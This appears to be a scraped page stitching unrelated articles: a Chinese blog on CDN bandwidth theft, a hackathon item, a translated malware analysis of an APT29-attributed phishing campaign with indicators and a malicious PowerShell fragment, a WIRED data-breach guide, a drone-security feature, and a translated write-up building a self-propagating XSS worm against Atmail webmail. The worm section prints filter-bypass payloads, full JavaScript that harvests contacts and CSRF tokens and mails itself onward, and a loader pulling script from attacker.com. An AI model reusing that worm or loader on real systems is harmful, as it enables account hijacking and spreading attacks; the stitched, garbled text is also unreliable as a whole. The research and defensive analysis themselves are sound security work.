我的CDN部署在腾讯云,10月2日接收到短信提醒:CDN流量已用完。登陆控制台后发现,被盗刷了360G,宽带峰值也到达了难以想象的680Mbps。 这对于一个个人网站来说,几乎是不可能的流量。






1.2 再次遭遇





我惯例去找了工单, 因为上次腾讯云的工程师专门call过来:只要增设了相关安全限制,下次确认是盗刷立即给予补偿 。然而这次工单依然是打太极,各种文档、规则扔给我,闭口不谈补偿问题,并且说是我的QPS设置太高了:)。



1.3 无路可走





2. 坎坷的补救措施



2.1 公司项目:更改CDN域名

观察被盗刷的资源,全部都是个人网站的静态资源。而公司项目只有合作的商户在使用,并且在 robots.txt 中禁止了爬虫,所以用利用另一个账号开启了一个新的COS并且开启了对应的CDN加速域名。


2.2 个人网站:Git平台

借助免费的Git平台,可以存放图片、代码等数据,并且可以在外部访问到。考虑到国内用户居多,所以我将友链界面的图片和文章中的图片存放到了 Coding.net 的公有仓库中。

例如下面这种图片的地址就是: https://qcloud.coding.net/u/godbmw/p/blog/git/raw/master/markdown-static/网站搭建与运营/第一次遭遇云服务器完全崩溃/1.png


当当我把代码放在Coding或者github上时,虽然可以请求到代码的内容, 但是 Response Header 中的 Content-Type 字段的值是: text/plain; ... 。对于CSS样式文件,浏览器无法自动解析 。因此,打包后的js、css等项目文件不能放在Git平台。

2.3 免费CDN: CloudFlare

这是全球最大的 免费的CDN ,并且 国内也可以访问 。ping值稳定在100ms左右,具体可以去查看相关测试文章。除此之外,cloudflare可以 抗下DDoS、CC等攻击 ,听说百度抗不下来海外的DDoS的时候,也是DNS解析到cloudflare进行处理。


感谢来自V友们的提示:请在CloudFlare的控制台的DNS面板中,点亮小云朵(开启HTTP Proxy),否则是无法使用他们的CDN的,IP还是暴露的。


控制台提高安全等级:默认是Essentially Off,可以根据情况提升 设置防火墙规则:国内ip直接访问,国外ip需要通过javascript验证 限制访问频次


3. 一些思考




不知道大家发现了没有,宽带必须到达10Gbps以上才可以免除。然而这次经历的才只有680Mbps,如果到10Gbps,那后果真是不敢想象,怕是要赔掉裤子。 和工单讨论的时候,工单就给了我这张图片,如果用户被盗刷达到了9Gbps呢?也是他们说的不符合要求,还是需要用户自己买单 。损失肯定难以衡量。希望日后平台可以改进相关规定。

刚做网站的时候关心名头(傻傻觉得越大公司越靠谱),现在才发现云平台的 安全稳定、补救措施、收费标准 才是关键。




可能是最靠谱不忽悠的 区块链 资讯平台



经常参加 EOS 会议的团队在旧金山的比赛中获得金奖,他们的 应用 符合项目经济和做出贡献的开发者的利益。






“过去30年间,开源开发者一直是科技行业的支柱,NouGit将给这些开源项目本身带来财富,而不是让财富都流到微软或者IBM,”Rob Behnke说,是一个连续创业者,也是五大NouGit队伍的其中一员,他们将在下个月到 南非 的开普敦参加黑客马拉松的决赛。






Behnke和他的同伴―Colby Gilbert,Fred Madrid,Mike Lin 和 来自摩尔多瓦的NicoLae Carabut―结合了软件工程、加密学、 金融科技 和UI/UX设计的专业知识。他们对改进开源模型的关注既反应了他们通过EOSIO和旧金山更大的区块链社区形成了有机体,也反映了他们有志于挖掘区块链在社会和经济变革上面的潜能。最终的结果是一个从开发者的角度出发、为开发者考虑的项目。

“我们分布在美国各地,但是我们经常会在旧金山的区块链合作空间Starfish Mission里面见面,”Behnke说。“我们经常在EOS会议中见面,黑客马拉松前一个月,我们特地安排了几次会议准备组队参赛。”


那么,在他们筹备NouGit产品的过程中,有什么收获呢?“和正确的人组队,然后相信彼此,这就是我们获得的最大的收获,” Behnke说,他还说EOSIO是业内最“有感染力”的平台。







第三方安全研究人员分析称该攻击是APT 29(CozyBear)组织发起的攻击活动,微软称APT 29为YTTRIUM。截止目前,微软研究人员称还没有足够的证据表明该攻击活动来源于APT 29。











攻击活动分析 传播




hxxps://www.jmj.com/personal/nauerthn_state_gov/TUJE7QJl[random string]



当用户点击链接后,就会被提供一个含有恶意LNK文件的ZIP文件。攻击中所有文件的文件名都是相同的,比如ds7002.pdf, ds7002.zip, ds7002.lnk。


LNK文件表示攻击的第一阶段。它会执行一个混淆的powershell命令,该命令会从LNK文件的offset 0x5e2be扩展16632字节的位置提取出base64编码的payload。






ds7002.PDF (诱饵PDF文件)

cyzfc.dat (1阶段植入)



然后PowerShell脚本会通过调用rundll32.exe来执行cyzfc.dat。在连接第一阶段C2服务器pandorasong[.]com (后,cyzfc.dat开始通过以下步骤来安装final payload:

1. 为第二阶段payload分配ReadWrite页;

2. 提取第二阶段payload作为资源

3. 将header融入到第一阶段payload的0xEF字节

4. 将header加到资源从字节0x12A开始的位置中;

5. 用滚动XOR(ROR1)方法从key 0xC5开始解密第二阶段payload。


第二阶段payload是Cobalt Strike的一个实例,Cobalt Strike是一个商业渗透测试工具,会执行以下步骤:

1. 以\\.\pipe\MSSE-<number>-server格式定义一个本地命名的pipe,其中<number>是0到9897之间的随机数字;

2. 连接到pipe,写入全局数据size 0x3FE00;

3. 通过命名的pipe实现后门:


XOR解码payload到新的RW内存区域,这次使用的XOR key为:用0x7CC2885F每4个字节进行简单XOR




将全局数据写入pipe实际上是写的是一个第三方payload。Payload也是用相同的XOR算法加密的,解密后,与Meterpreter header组成了一个PE文件,可以翻译PE header中的指令,并将控制转移到反射加载器上:







Indicators of attack Files (SHA-1)

ds7002.ZIP: cd92f19d3ad4ec50f6d19652af010fe07dca55e1

ds7002.LNK: e431261c63f94a174a1308defccc674dabbe3609

ds7002.PDF (decoy PDF): 8e928c550e5d44fb31ef8b6f3df2e914acd66873

cyzfc.dat (first-stage): 9858d5cb2a6614be3c48e33911bf9f7978b441bf

URLs hxxps://www.jmj[.]com/personal/nauerthn_state_gov/VFVKRTdRSm

C&C servers

pandorasong[.]com ( (first-stage C&C server) 安全团队可以查找网络中相关的活动来确定是否被攻击和入侵: //Query 1: Events involving the DLL container
let fileHash = "9858d5cb2a6614be3c48e33911bf9f7978b441bf";
find in (FileCreationEvents, ProcessCreationEvents, MiscEvents,
RegistryEvents, NetworkCommunicationEvents, ImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where EventTime > ago(10d)
//Query 2: C&C connection
| where EventTime > ago(10d)
| where RemoteUrl == "pandorasong.com"
//Query 3: Malicious PowerShell
| where EventTime > ago(10d)
| where ProcessCommandLine contains
"-noni -ep bypass $zk=' JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0"
//Query 4: Malicious domain in default browser commandline
| where EventTime > ago(10d)
| where ProcessCommandLine contains
//Query 5: Events involving the ZIP
let fileHash = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1";
find in (FileCreationEvents, ProcessCreationEvents, MiscEvents,
RegistryEvents, NetworkCommunicationEvents, ImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where EventTime > ago(10d)

Data Breaches: The Complete WIRED Guide


Another week, another massive new corporate security breach that exposes your personal data. Names,email addresses, passwords, Social Security numbers, dates of birth, credit card numbers, banking data, passport numbers, phone numbers, home addresses, driver’s license numbers, medical records―they all get swept up by shadowy, amorphous hackers for fraud, identity theft, and worse. Sometimes the affected company will send you an email suggesting that you change a password or credit card number, but for the most part, these incidents are invisible―until they aren’t.

Think of data breaches as coming in two flavors: breaches of institutions that people choose to entrust with their data―like retailers and banks―and breaches of entities that acquired user data secondarily―like credit bureaus and marketing firms. Unfortunately, you can’t keep your information perfectly safe: It is often impossible to avoid sharing data, especially with organizations like governments and health insurers. Furthermore, in cases where a company or institution gives your information to an additional party, you’ve often agreed to sharing more data than you realize by clicking "I accept" on a dense user agreement.

Many of these incidents don’t necessarily even involve hackers. Data “exposures” occur when information that should have been locked down was accessible, but it’s unclear if anyone actually stole it.

Even after a data breach has occurred, though, and an unauthorized actor definitely has your data, you won’t necessarily see an immediate negative impact. Hackers who steal a trove of login credentials, for example, may quietly use them for under-the-radar crime sprees instead of selling or publishing the data. As a result, the repercussions of a breach can be very delayed, sometimes not fully manifesting for years.

Attackers tend to capitalize on certain types of data right away, namely financial information like credit card numbers. But some troves of data disappear into the ether, becoming a sort of ticking time bomb. Yet victims of identity theft know the consequences of data breaches intimately and painfully. They may have their credit wrecked by thieves, lose all their money, or be dogged for years by a shadow hand meddling in their affairs and opening digital accounts in their name.

The problem is so abstract and far-reaching that you would be forgiven for feeling that it’s not worth grappling with at all. Unfortunately for victims, there is no such thing as perfect security, and no way to eliminate absolutely all data breaches. But massive institutional breaches don’t need to happen as often as they do. Many occur not because of complex and sophisticated hacking but because organizations have made basic and potentially avoidable mistakes in implementing their security schemes. They’re low-hanging fruit for hackers to pluck.

Yes, it’s a difficult, never-ending process for a large organization to secure its inevitably sprawling networks, but for decades many institutions just haven’t really tried. They’ve gone through some of the motions without actually making digital security a spending priority. Over thepast 10 years, however, as corporate and government data breaches have ramped up―impacting the data of billions of people―institutional leaders and the general public alike have finally begun to understand the urgency and necessity of putting security first. This increased focus is beginning to translate into some concrete data protections and security improvements. But collective inaction for decades has created a security deficit that will take significant time and money to make up. And the reality that robust digital security requires never-ending investment is difficult for institutions to accept.

The History of Data Breaches

Data breaches have been increasingly common and harmful for decades. A few stand out, though, as instructive examples of how breaches have evolved, how attackers are able to orchestrate these attacks, what can be stolen, and what happens to data once a breach has occurred.

Digital data breaches started long before widespread use of the internet, yet they were similar in many respects to the leaks we see today. One early landmark incident occurred in 1984, when the credit reporting agency TRW Information Systems (now Experian) realized that one of its database files had been breached. The trove was protected by a numeric passcode that someone lifted from an administrative note at a Sears store and posted on an “electronic bulletin board”―a sort of rudimentary Google Doc that people could access and alter using their landline phone connection. From there, anyone who knew how to view the bulletin board could have used the password to access the data stored in the TRW file: personal data and credit histories of 90 million Americans. The password was exposed for a month. At the time, TRW said that it changed the database password as soon as it found out about the situation. Though the incident is dwarfed by last year’s breach of the credit reporting agency Equifax (discussed below), the TRW lapse was a warning to data firms everywhere―one that many clearly didn’t heed.

Large-scale breaches like the TRW incident occurred sporadically as years went by and the internet expanded. By the early 2010s, as mobile devices and the Internet of Things greatly expanded interconnectivity, the problem of data breaches became especially urgent. Stealing username/password pairs or credit card numbers―even breaching a trove of data aggregated from already public sources―could give attackers the keys to someone’s entire online life. And certain breaches in particular helped fuel a growing dark web economy of stolen user data.

What Counts as a Data Breach?

A data breach occurs any time an entity accesses information it wasn’t meant to. If someone inconspicuously looks over your shoulder at your smartphone and reads what you’re typing, that’s a data breach. If someone a block away uses binoculars to look through your window and see what you’re watching on TV, that’s a data breach as well. You may not think it matters if someone knows you like The Good Place , but if it isn’t your intent for people to see what you’re watching, it’s a violation of your expectations.

One of these incidents was a breach of LinkedIn in 2012 thatinitially seemed to expose 6.5 million passwords. The data was hashed, or cryptographically scrambled, as a protection to make it unintelligible and therefore difficult to reuse, but hackers quickly started “cracking” the hashes to expose LinkedIn users’ actual passwords. Though LinkedIn itself took precautions to reset impacted account passwords, attackers still got plenty of mileage out of them by finding other accounts around the web where users had reused the same password. That all too commonlax password hygiene means a single breach can haunt users for years.

And What Counts as Exposure?

Think of an exposure as putting that same window at street level. Anyone walking by could see what’s on your TV. Whether they actually do doesn’t matter―the risk is there. When sensitive data like medical records or banking information gets exposed, the stakes are high.

The LinkedIn hack also turned out to be even worse than it first appeared. In 2016 a hacker known as “Peace”started selling account information, particularly email addresses and passwords, from 117 million LinkedIn users. Data stolen from the LinkedIn breach has been repurposed and re-sold by criminals ever since, and attackers still have some success exploiting the data to this day, since so many people reuse the same passwords across numerous accounts for years.

Then What?

A common reassurance after a data exposure is that there is no evidence the data was stolen. To a degree, it is possible to review access logs and other system indicators to determine this, but generally organizations have no way of knowing for certain what went on while they weren’t watching. This is what makes data exposures such a big problem, whether it’s through your window or via a database that a company left accessible online: It’s always possible that someone realized they could peek in and exfiltrated some information without anyone realizing.

Data breaches didn’t truly become dinner table fodder, though, until the end of 2013 and 2014, when major retailers Target, Neiman Marcus, and Home Depot suffered massive breaches one after the other. TheTarget hack, first publicly disclosed in December 2013, impacted the personal information (like names, addresses, phone numbers, and email addresses) of 70 million Americans and compromised 40 million credit card numbers. Just a few weeks later, in January 2014, Neiman Marcus admitted that its point-of-sale systems had been hit by the same malware that infected Target, exposing the information of about 110 million Neiman Marcus customers, along with 1.1 million credit and debit card numbers. Then, after months of fallout from those two breaches, Home Depot announced in September 2014 that hackers had stolen 56 million credit and debit card numbers from its systems byinstalling malware on the company’s payment terminals.

An even more devastating and sinister attack was taking place at the same time, though. The Office of Personnel Management is the administrative and HR department for US government employees. The department manages security clearances, conducts background checks, and keeps records on every past and present federal employee. If you want to know what’s going on inside the US government, this is the department to hack . So China did.

Hackers linked to the Chinese government infiltrated OPM’s network twice , first stealing the technical blueprints for the network in 2013, then initiating a second attack shortly thereafter in which they gained control of the administrative server that managed the authentication for all other server logins. In other words, by the time OPM fully realized what had happened and acted to remove the intruders in 2015, the hackers had been able to steal tens of millions of detailed records about every aspect of federal employees’ lives, including 21.5 million Social Security numbers and 5.6 million fingerprint records . In some cases, victims weren’t even federal employees, but were simply connected in some way to government workers who had undergone background checks. (Those checks include all sorts of extremely specific information, like maps of a subject’s family, friends, associates, and children.)

Pilfered OPM data never circulated online or showed up on the black market, likely because it was stolen for its intelligence value rather than its street value. Reports indicated that Chinese operatives may have used the information to supplement a database cataloging US citizens and government activity.

Today, data breaches are so common that the cybersecurity industry even has a phrase―“breach fatigue”―to describe the indifference that can come from such an overwhelming and seemingly hopeless string of events. And while tech companies, not to mention regulators, are starting to take data protection more seriously, the industry has yet to turn the corner. In fact, some of the most disheartening breaches yet have been disclosed in the last couple of years.

Yahoo lodged repeated contenders for the distinction of all-time biggest data breach when it made an extraordinary series of announcements beginning in September 2016. First, the company disclosed that anintrusion in 2014 compromised personal information from 500 million user accounts. Then, two months later, Yahoo added that it had suffered a separate breach inAugust 2013 that exposed a billion accounts. Sounds like a pretty unassailable lead in the race to the data-breach bottom, right? And yet! In October 2017, the company said that after further investigation it was revising its estimate of 1 billion accounts to 3 billion―or every Yahoo account that existed in August 2013.

There are few companies that even have billions of user accounts to lose, but there are still other ways for a breach to be worse than the Yahoo debacles. For example, the credit monitoring firm Equifax disclosed amassive breach at the beginning of September, which exposed personal information for 147.9 million people. The data included birth dates, addresses, some driver's license numbers, about 209,000 credit card numbers, and Social Security numbers―meaning that almost half the US population potentially had their crucial secret identifier exposed . Because the information stolen from Equifax was so sensitive, it's widely considered the worst corporate data breach ever. At least for now.

Equifax also completely mishandled its public disclosure and response in the aftermath. The site the company set up for victims was itself vulnerable to attack, and it asked for the last six digits of people's Social Security numbers to check if their data had been impacted by the breach. This meant that Equifax was asking Americans to trust them with their data all over again. Equifax also made the breach-response page a stand-alone site, rather than part of its main corporate domain―a decision that invited imposter sites and aggressive phishing attempts. The official Equifax Twitter account even mistakenly tweeted the same phishing link four times. Four. Luckily, in that case, it was just a proof-of-concept research page and not an actual malicious site.

There have since beennumerous indications that Equifax had a dangerously lax security culture and lack of response procedures in place. Former Equifax CEO Richard Smith told Congress in October 2017 that he usually only met with security and IT representatives once a quarter to review the company's security posture. And hackers got into Equifax's systems for the breach through a known web framework vulnerability for which a patch had been available for months. A digital platform used by Equifax employees in Argentina was even protected by the ultra-guessable credentials "admin, admin"―a truly rookie mistake.

If any good came from the Equifax breach, it was that the sheer severity may have served as the wake-up call corporate American needed. On the other hand, a year after that breach, the frequency of successful attacks doesn’t seem to have abated. And the eeriest thing about the Equifax breach? The data still hasn’t surfaced. Data aggregators like Equifax, who pull in an enormous amount of public and private information from myriad sources, have become a single point of failure of the digital age. More and more often, attackers target data analytics companies as a one-stop-shop for valuable information. But hackers still have their sights set on the true industry giants as well―if they can find a way in. Just weeks ago, Facebook disclosed its first-ever true data breach , in which attackers gained access to 30 million user authorization tokens. This meant that the hackers could access users’ Facebook accounts and exfiltrate a significant portion of their personal data. Facebook is investigating the incident with the FBI and has not yet said who was behind it or what their goals were in launching the attack.

And the security breach train rolls on. Within a few days of each other this month, Marriott and Quora both announced large breaches impacting more than 100 million users. InMarriott’s case, the intrusion occurred in the Starwoods Preferred Guest system and persisted for four years. Marriott acquired Starwoods in September 2016, two years after attackers would have first infiltrated, but it then persisted for two more years on Marriott’s watch. The breach exposed various combinations of personal details, including hundreds of millions of passport numbers, from as many as 500 million customers overall, making it one of the three largest known breaches to date.

The Future of Data Breaches

Attackers are able to perpetrate most current data breaches relatively easily by exploiting an institution’s basic security oversights―that’s what happened with Home Depot, OPM, and Equifax. If businesses and other institutions learned from these organizations’ mistakes, there could be a real reduction in the number of data breaches that occur overall. But improvement doesn’t come from making breaches impossible. The best improvements come from accepting the possibility of breach and significantly raising the barrier to entry or the resources required to carry one off. This would deter many would-be attackers, because unskilled hackers (or those who are simply idly poking around) wouldn’t be able to find as many blatant vulnerabilities to easily exploit.

An important concept in security, though, is the idea of the cat and mouse game. For determined, motivated, and well-resourced attackers, improved defenses spur malicious innovation. This is why security is an endless expense that institutions try to minimize, cap, or avoid altogether―defenders need to think of everything, while attackers only need to find one small mistake. An unpatched web server or an employee clicking a malicious link in a phishing email can be all it takes.

That’s also why some of the most groundbreaking examples of next-generation hacking come from targeted attacks to surveil high-profile individuals and groups―often political candidates, dissidents, activists, or spies attempting to infiltrate each others’ organizations. Hackers working to carry out these types of high-priority attacks will develop or pay large sums of money for so-called zero-day exploits. These consist of two parts: information about an undisclosed vulnerability in a system, and software that is programmed to take advantage of that flaw to give some type of increased system access or control to whoever deploys the exploit. A software developer can’t defend a vulnerability they don’t know about, so zero-day exploits push the limits of what’s possible for attackers by giving them a secret path into a network or database.

What Should Institutions Do? Lock It Down

Require users to set up strong, unique passwords and two-factor authentication to access network services.

Keep 'Em Out

Implement access controls so everyone can’t access everything. Users should only be able to see the content and applications they need.

Slice It Up

Segment enterprise networks so that sensitive data and operations run in different digital areas and aren’t accessible from parts of the network that are low-sensitivity.

Update It Quick

Apply software updates as soon as they’re available. For real.

More attackers may be forced to use zero-day exploits to carry out future breaches―increasing the resources required―if businesses, governments, and other institutions succeed in substantially improving their baseline cybersecurity postures through initiatives like consistent patching and network access control. But for now, enough easy targets remain that attackers don’t need to work very hard or spend a lot of money to perpetrate massive data breaches. Even just using publicly available internet scanning tools can reveal unprotected devices and databases where valuable information is tantalizing exposed.

Until that changes, US citizens and permanent residents would have more protection against fraud and identity theft if the US government would replaceSocial Security numbers. These strings of digits were never meant to act as universal identifiers, much less as secure authenticators, and it is impossible for people to keep a set of digits secret when they are also being asked to share the number repeatedly throughout their lives. Instead, the US government should offer (as other countries do) a purpose-built universal identity scheme that incorporates numerous, diverse authenticators. That way, even if hackers compromise one piece of information, people can still regain control of their identities.

Ideally, companies and other institutions that hold data would commit to invest forever in rigorously locking their systems down. But organizations always vacillate between factoring in cost, ease of use, and risk. There’s no easy way to reconcile the three. And even if there were, no security scheme is ever perfect. The best way to minimize the impact of a mega-breach, then, is not just to reduce the number of incidents, but to better manage the inevitable fallout.

Sunflower Labs is building a drone surveillance system for high-end homes


Tucked away high in the residential hills of suburban San Carlos, California, is a three-bedroom home with its own autonomous aerial security system. The house is no different than any other residence on the quiet street full of well-manicured lawns and spacious views of the Pulgas Ridge Preserve.

But it just happens to be the personal home of former Evernote executive and Sunflower Labs CEO Alex Pachikov. He’s turned the house into a prototype home for the Sunflower system, which uses a series of motion and vibration sensors in conjunction with an autonomous drone to monitor all activity, down to measuring the footsteps on the grass outside his front door.

“We have a core belief that a lot of value is hidden not just in the vision spectrum, but the motion and vibration spectrum,” Pachikov tells me before using a Siri integration on his iPhone to launch the drone from his backyard with a voice command.

Part of the Sunflower system involves the Sunflowers, the small, roughly 1.5-meter bulbs filled with sensors that are disguised as garden lights. “The sensors can detect people, pets, and cars. Vibration sensors detect footsteps, car engines... even if you’re running a coffee maker.” The Sunflowers are placed around the home to help create a map and triangulate people and other objects within the space. But the real draw of the Sunflower system is the drone that flies itself. The drone is called the Bee, and its base station is called the Hive.

Sunflower Labs is building a drone surveillance system for high-end homes

The whole system works together by letting the Bee leave its station and then fly around the home capturing video by using the Sunflowers to perform path planning and relying on its built-in cameras and sensors to avoid obstacles. When it’s ready to land, you press a button on the Sunflower mobile app, and the drone docks itself into the funnel-shaped landing zone of the base station, which also doubles as a conductive wireless charger.

In practice, the Sunflower system would alert a homeowner of something unexpected moving around the house, thanks to the ground sensors. They would then manually choose whether to deploy the drone, which would then stream a live 1080p video feed to your phone or tablet. Once the drone is docked again, the video is saved to the cloud. The company says it’s designing the system to be deployable by both homeowners and third-party monitoring services, like ADT, in the event that you’re asleep or away from home and not monitoring your phone when the activity occurs.

“The security industry is just absolutely ripe for disruption. They haven’t done anything particularly new in 30 years,” Pachikov says. “It’s door and window sensors, and CCTV cameras.” Instead of having to go back and see what went wrong after an intruder has already broken in, or needing to have someone monitor the system all of the time, Pachikov says he “wants to know what’s happening around my property before it’s at my door.” For instance, if someone is scoping out the house to see whether it could be a viable target at some later date.

Sunflower Labs is building a drone surveillance system for high-end homes

Although the concept of operating your own personal drone surveillance system can seem outlandish and excessive, Pachikov sees it as a viable and new type of deterrent. “Current security systems don’t provide any deterrents. Mostly it’s a 120-decibel alarm that blows out your eardrums because it’s mostly false alarms,” he says. “If the drone comes out, it’s very similar to a security guard coming out, or at the very least, a dog barking.” The noise is a deterrence element, too; in my experience, it was about as loud as other consumer drones on the market. Pachikov says they plan on reducing the noise a bit, and that using 3D-printed parts for the prototype is one reason why it’s louder than the company eventually intends it to be.

In this way, Sunflower Labs represents a new kind of drone company. It’s one that specializes less in the physical hardware and camera capabilities of an unmanned aerial vehicle (UAV), like Chinese drone giant DJI, but in the possibilities a drone provides you as a consumer if it’s specifically outfitted to fulfill a certain need. Similar to Skydio, an AI-focused startup that makes a self-flying drone for action sports enthusiasts , Sunflower is taking advantage of the fast-maturing drone market to sell the promise of aerial video surveillance to both the home consumer and the security industry at large.

Sunflower Labs has been working on the project for nearly three years now with more than $6 million in funding . Investors include General Catalyst ― former Evernote CEO and co-founder Phil Libin, who now works as an adviser at GC, helped close the seed round ― and Stanley Black & Decker, the industrial tool maker that also happens to be a major supplier of commercial security systems. The company is split between 10 employees in Zurich, Switzerland, and another eight in San Francisco.

The goal with the Sunflower system right now is to sell it to consumers on a subscription, while pursuing commercial applications in the future. Pachikov estimates that the whole package will cost someone around a few hundred dollars a month, and it will include the Sunflower sensor lights, the Hive base station, and a Bee drone.

Pachikov has no delusions about the product or who it is designed for. Sunflower doesn’t want every home to be outfitted with a security drone. “We’re going for higher-end, affluent people who are tech-savvy and eager to do this,” Pachikov says. “Once we’re self-sustaining, we’re going to drive the cost down and go for more regular homes.”

Sunflower Labs is building a drone surveillance system for high-end homes

The goal is to target low- to medium-density areas; in other words, suburban America. Pachikov says Sunflower already has thousands of customers lined up to purchase the system with its subscription model. Down the line, Pachikov says its ties with Stanley Black & Decker will open up new avenues into commercial drone security. The hope is that, unlike standard, wired security systems or even the AI-driven Knightscope security robots , a drone is a better and more efficient way to surveil a scene, cover large amounts of ground quickly, and avoid being tampered with by an intruder.

There is, of course, the matter of Federal Aviation Administration regulations , which make commercial drone operations a bit difficult without jumping through some serious regulatory hoops. There are also rules for consumer and hobbyist drone flights concerning flying outside an operator’s line of sight as well as at night. (The Sunflower drone is designed to capture video at night and operate autonomously in the dark, as well as other tricky weather conditions like rain and wind.)

“The regulations to allow things like this are imminent,” he says. Currently, in a homeowner setting, you can fly a drone on your own property as a hobbyist. Eventually, Pachikov wants the drone to be able to deploy itself without requiring the manual go-ahead from the mobile app. To get there, Sunflower will have to bring the weight of its drone down a bit, as Pachikov says a device under half a pound would bring the UAV into the least restrictive FAA category. “We’re at three pounds. Hopefully, we drive the weight down and they raise the limit.”

What is clear is that, regardless of the regulatory road map, security drones are indeed on the way, and Sunflower wants to be at the forefront of both the consumer and commercial market. And while the Sunflower system may be for wealthy homeowners for now, Pachikov sees a broader audience on the horizon. “I see it like the Tesla Roadster. It’s a fun proof of concept, but it’s not a consumer car. We see this [the Sunflower system] as our Roadster,” he says.

Photography by Nick Statt / The Verge





Atmail是一个热门的云服务以及电子邮件托管提供商,目前有很多公司、主机服务商和ISP都在使用Atmail,比如说DreamHost、LegalShield (美国)、m:tel(波斯尼亚)、iiNet和Optus (澳大利亚)。


作为DreamHost上的一名Atmail用户,当我在专注于漏洞奖励项目的过程中,我曾见过几次令我印象深刻的基于电子邮件的跨站脚本(XSS)攻击。当时我曾尝试从他们的Web邮件客户端中寻找安全漏洞,几个小时后我便开发出了一个可用的Payload,但是我想更进一步,也就是构建一个 旧式的XSS蠕虫 。最著名的XSS蠕虫就是2005年感染MySpace的 蠕虫病毒 了,而且在2014年这个蠕虫的最新变种还成功感染了 TweetDeck 。

在这篇文章中,我将会给大家演示如何构建一个可以通过目标用户联系人来进行自我传播的XSS Payload。



cat content | mail -a "Content-type: text/html" -s "test" victim1@zjulian.com

接下来,使用Firefox的开发者工具来查看XSS Payload在Web邮件客户端的DOM中是如何呈现的。

构建XSS Payload

第一步,就是要构建一个能够绕过Atmail内容过滤器的XSS Payload。我一开始发送了一封包含了全部有效HTML标签的邮件,然后看看它是否能够成功送达,尽管我只打算使用<img>标签。不过,<img>标签虽然非常适合构建XSS Payload,但是在XSS触发之前,目标用户必须要选择在Atmail中显示图像才行。因此我们得使用那些不需要用户交互便可以呈现内容的标签,这样才能提升Payload的质量。



<img longdesc="src='x'onerror=alert(document.domain);//><img "src='showme'>


<img longdesc="src=" images="" stop.png"=""onerror="alert(document.domain);//"" src="x"alt="showme">


1、 提取目标用户的联系人列表;

2、 从Atmail提取有效的CSRF令牌;

3、 向目标用户联系人列表中的每一位用户发送恶意邮件;

代码大致如下,XSS Payload以URL编码的形式提供:

//HTTP request to grab victim's contacts xmlHttp=newXMLHttpRequest(); xmlHttp.open('GET','/index.php/mail/contacts/viewcontacts/GroupID/0',false); xmlHttp.send(null); response=xmlHttp.responseText; //Extract email addresses and filter duplicates var extractedemails = response.match(/[A-Z0-9._%+-]+@[A-Z0-9.-]+.[A-Z]{2,4}/igm); var uniqueemails = []; for(vari = 0; i < extractedemails.length; i++){if(uniqueemails.indexOf(extractedemails[i]) == -1)uniqueemails.push(extractedemails[i]);} //HTTP request to get CSRF token xmlHttp.open('GET','/index.php/mail/contacts',false); xmlHttp.send(null); response2=xmlHttp.responseText; var csrftoken = response2.match(/name=\"atmailCSRF"value=\"(.+?)\"/im); //Loop through contacts and send email for(var i = 0; i < uniqueemails.length; i++) { xmlHttp.open('POST','/index.php/mail/composemessage/send',false); var params = 'atmailCSRF=' + csrftoken[1]+ '&emailTo=' + unique[i] +'&emailSubject=open%20me&emailBodyHtml=%3c%68%33%3e%61%74%6d%61%69%6c%20%65%6d%61%69%6c%20%58%53%53%20%77%6f%72%6d%3c%2f%68%33%3e%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0a%3c%69%6d%67%20%6c%6f%6e%67%64%65%73%63%3d%22%73%72%63%3d%27%78%27%6f%6e%65%72%72%6f%72%3d%65%76%61%6c%28%77%69%6e%64%6f%77%2e%61%74%6f%62%28%27%61%57%35%6a%62%48%56%6b%5a%54%31%6b%62%32%4e%31%62%57%56%75%64%43%35%6a%63%6d%56%68%64%47%56%46%62%47%56%74%5a%57%35%30%4b%43%64%7a%59%33%4a%70%63%48%51%6e%4b%54%74%70%62%6d%4e%73%64%57%52%6c%4c%6e%4e%79%59%7a%30%6e%61%48%52%30%63%48%4d%36%4c%79%39%68%64%48%52%68%59%32%74%6c%63%69%35%6a%62%32%30%76%59%58%52%74%59%57%6c%73%4c%6d%70%7a%4a%7a%74%6b%62%32%4e%31%62%57%56%75%64%43%35%6f%5a%57%46%6b%4c%6d%46%77%63%47%56%75%5a%45%4e%6f%61%57%78%6b%4b%47%6c%75%59%32%78%31%5a%47%55%70%4f%77%3d%3d%27%29%29%3b%2f%2f%3e%3c%69%6d%67%20%22%20%73%72%63%3d%27%73%68%6f%77%6d%65%27%3e'; xmlHttp.setRequestHeader('Content-type','application/x-www-form-urlencoded'); xmlHttp.send(params);

首先,我尝试过Base64编码,然后把XSS Payload嵌入到了onerror事件中。接下来,代码会使用eval(atob())来解码并执行Payload代码:

<img longdesc=" xss/src='x'onerror=eval(window.atob('eGg9bmV3IFhNTEh0dHBS…omitted forbrevity…'));//><img " src='showme'>

但是,我发现Atmail会将我Base64编码的字符串压缩到945个字符,这就太短了。所以我打算把它托管到一个外部地址,然后重写我的XSS Payload:



onerror="include=document.createElement('script');include.src='https://attacker.com/atmail.js';document.head.appendChild(include);" 下面的视频演示了蠕虫的工作机制: 总结




参考代码 <img src="x" align="left" alt="test"border="1px" crossorigin="anonymous"height="100px" hspace="100px" ismaplongdesc="test" sizes="(min-width: 600px) 200px, 50vw"srcset="test.png 2x" usemap="#test"vspace="100px" width="100px">

* 参考来源: bishopfox ,FB小编Alpha_h4ck编译,转载请注明来自CodeSec.Net

Report: Pioneering Privileged Access Management


Gartner released the first-ever Magic Quadrant for Privileged Access Management * , it is, in our view, a significant milestone for the industry. We believe it spotlights the critical importance of protecting privileged credentials amidst digital transformation initiatives and the ever-changing threat landscape.

So why the heightened interest in privileged access? The simple answer: disruption starts with privileged access.

The birth of an industry

The concept of ‘privilege’ started simply enough. Privileged access originally referred to the accounts that IT and systems administrators used to maintain networks and systems. These accounts were primarily shared accounts and gave the user all-powerful access to data and information systems on a network. Whoever controlled these accounts controlled the network.

